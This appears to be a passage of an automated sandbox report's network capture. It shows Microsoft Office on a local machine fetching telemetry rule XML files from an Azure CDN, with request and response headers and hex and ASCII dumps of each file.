                                                                                                                                                                                            2024-11-20 20:05:45 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            112192.168.2.44990613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:45 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:45 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                            x-ms-request-id: fce879e9-f01e-0052-0d66-3b9224000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200545Z-178bfbc474bkvpdnhC1NYCuu2w00000000bg0000000030a6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            113192.168.2.44991013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:45 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:45 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                            x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200545Z-r1d97b99577mrt4rhC1TEBftkc000000097g00000000bdq0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            114192.168.2.44991113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:45 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:45 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                            x-ms-request-id: e2992625-501e-005b-678c-3ad7f7000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200545Z-1777c6cb754xjpthhC1TEBexs800000009wg00000000fvqr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:46 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            115192.168.2.44991213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:47 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:47 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                            x-ms-request-id: 073920b7-a01e-0032-4c8c-3a1949000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200547Z-1777c6cb754gvvgfhC1TEBz4rg0000000a0000000000ykmh
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:47 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            116192.168.2.44991313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:47 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:47 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                            x-ms-request-id: 6d560277-a01e-0050-158c-3adb6e000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200547Z-185f5d8b95c4vwv8hC1NYCy4v40000000asg000000012um7
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:47 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            117192.168.2.44991413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:47 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:47 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                            x-ms-request-id: 3044792c-001e-005a-088c-3ac3d0000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200547Z-1777c6cb754vxwc9hC1TEBykgw0000000a30000000009fc8
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:47 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            118192.168.2.44991513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:47 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:47 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                            x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200547Z-r1d97b99577ndm4rhC1TEBf0ps00000009f0000000009cy7
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:47 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            119192.168.2.44991613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:47 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:48 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                            x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200548Z-178bfbc474bmqmgjhC1NYCy16c00000000gg000000006dmy
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:48 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            120192.168.2.44991713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:49 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:50 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                            x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200550Z-178bfbc474bmqmgjhC1NYCy16c00000000e0000000005et6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:50 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            121192.168.2.44991913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:49 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
